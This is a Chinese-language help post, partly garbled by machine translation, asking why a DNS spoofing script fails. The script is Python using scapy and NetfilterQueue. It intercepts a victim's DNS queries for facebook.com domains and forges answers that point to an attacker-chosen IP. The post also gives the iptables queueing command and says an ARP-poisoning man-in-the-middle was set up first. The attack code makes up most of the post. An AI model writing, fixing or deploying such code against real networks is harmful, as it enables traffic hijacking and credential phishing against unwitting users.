python实现dns欺骗_Python dns欺骗不工作nome未解决

我不知道为什么mi脚本不起作用,受害者浏览器显示:ERR:named not resolved。在

我的剧本from scapy.all import *

from netfilterqueue import NetfilterQueue

spoofDomain = 'www.facebook.com'

spoofResolvedIp = '172.16.16.162'

queueId = 1

def dnsSpoof(packet):

originalPayload = IP( packet.get_payload() )

if not originalPayload.haslayer(DNSQR):

# Not a dns query, accept and go on

packet.accept()

else:

if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):

print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()

# Build the spoofed response

spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/\

UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/\

DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,\

an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))

print "Spoofing DNS response to: " + spoofedPayload.summary()

packet.set_payload(str(spoofedPayload))

packet.accept()

print "------------------------------------------"

else:

# DNS query but not for target spoofDomain, accept and go on

packet.accept()

# bind the callback function to the queue

nfqueue = NetfilterQueue()

nfqueue.bind(queueId, dnsSpoof)

# wait for packets

try:

nfqueue.run()

except KeyboardInterrupt:

print('')

nfqueue.unbind()

我使用iptables-tmangle-iforward-pdudp-jnfqueue--queue num1命令。在

首先,我用ARP缓存欺骗进行中间人攻击。我看不到以前的交通状况了。在

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值